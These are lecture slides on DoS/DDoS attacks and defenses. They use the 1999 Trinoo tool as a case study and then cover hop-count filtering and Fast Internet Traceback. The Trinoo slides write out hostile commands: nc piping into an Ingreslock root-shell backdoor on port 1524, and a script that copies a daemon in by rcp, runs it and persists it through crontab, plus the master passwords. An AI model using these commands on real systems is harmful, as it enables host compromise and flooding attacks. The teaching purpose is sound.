Network Security CIA +Availability By Jinjian Ma
Topics • DOS/DDoS • Detection & Defense • Prevention
DOS/DDoS Types • Vulnerability attack • Flooding attack
DoS vs DDoS DoS: • Attack is launched from single host • Less powerful DDoS: • Two components: agent & handler • Hard to defend
DDoS step by step 1. Attacker have some knowledge of program/system flaw 2. Scan network, build a list of compromised hosts 3. Select desired architecture 4. Distribute agents, optionally, hide agents process 5. Launch attack
Real life example Trinoo (1999) • a easy to use DDoS tool • Free download • master and daemons network
Trinoo Deployment I will exploit TCP port 1524 to do something evil attacker Ingreslock backdoor uses port 1524, telnet to it will give you a root shell nmap scan port 1524
Trinoo Deployment ./trin.sh | nc A.A.A.A 1524 & ./trin.sh | nc B.B.B.B 1524 & ./trin.sh | nc C.C.C.C 1524 & ./trin.sh | nc D.D.D.D 1524 & A.A.A.A B.B.B.B C.C.C.C D.D.D.D Compromised hosts found by scan Note: you can imagine nc does almost the same thing as telnet
trin.sh echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen" echo "echo rcp is done moving binary" echo "chmod +x /usr/sbin/rpc.listen" echo "echo launching trinoo" echo "/usr/sbin/rpc.listen" echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron" echo "crontab cron" echo "echo launched" echo "exit"
Trinoo Network attacker uses telnet to interact with master master master master master send daemons … … messages to listen to port … daemons connected to master daemon daemon daemon daemon daemon daemon Message flood victim
Attack using Trinoo 1.Prepare daemons on compromised hosts 2.Launch masters, enter password (gOrave) 3.Telnet to masters, enter password (betaalmostdone) 4.Now you can control a DDoS attack • Control packet size • Decide attack duration • Stop/Start attack
Attack using Trinoo Show active daemons Launch an attack
Attack using Trinoo
Daemon Source code
Based on DDoS … ICMP smurf flooding • forge ICMP source to victim TCP SYN flooding UDP flooding …
Detection & Defense Hop-count IP traceback Intrusion Detection Systems (IDS)
When Hop-count useful Attackers want: 1. conceal flooding sources and localities of flooding traffic 2. coax uncompromised hosts into becoming reflectors Idea: 1. Modern OSs use few selected initial TTL typically: 30, 32, 60, 64, 128, 255 2. Maintain a IP-HOP map table
Hop-count Pros: • Easy to implement, using existing TTL field • Effective to IP spoofing Cons: • Forged pkts have the same hop-count as zombies • Attacks which do not spoof IP
IP traceback Traceback true attacking source • Router packet marking • Path reconstruction algorithm Fast Internet Traceback (FIT)
Fast Internet Traceback C C : global constant 6 th bit in TTL
Fast Internet Traceback ID: 111(4 th part of IP hash) TTL: 245 -> 1111 0101 ID: 111(4 th part of IP hash) RIT implemented router TTL: 244 -> 1111 0100 This packet came ID: 0101100000000000 from a RIT router 3 TTL: 254 -> 1111 1110 ID: 0101100000000000 hops away from me! TTL: 253 -> 1111 1101 ID: 0101100000000000 TTL: 255 -> 1111 1111 ID: 111(4 th part of IP hash) TTL: 246 -> 1111 0110 ID: 111(4 th part of IP hash) TTL: 243 -> 1111 0011 6 th bit in TTL
Fast Internet Traceback 6 th bit in TTL FIT router C = 22 Original TTL: 253 -> (1111 1101) observed TTL: 245 observed TTL: 244 observed TTL: 243 C = 22 -----------> (1 0110) New TTL: 246 ---> (1111 0110) b: 1 Marking probability: 0.04
Fast Internet Traceback observed TTL: 243 --> (1111 0011) d = (b|c - TTL [5::0] ) mod 64 C = 22 ---> (1 0110) d = (1|1 0110 - 110011) mod 64 b: 1 = 3 mod 64 = 3 hops aways from FIT ruoter Server maintains a map of IP hashes Precomputed before attack
Fast Internet Traceback Pros: • Not every router has to be RIT router • Not violate original design of IP header Cons: • Not effective to spoofed IP
Prevention Redundant service Defense using puzzle Pushback Challenge: No security policies can be globally enforced
Question ?
Recommend
More recommend
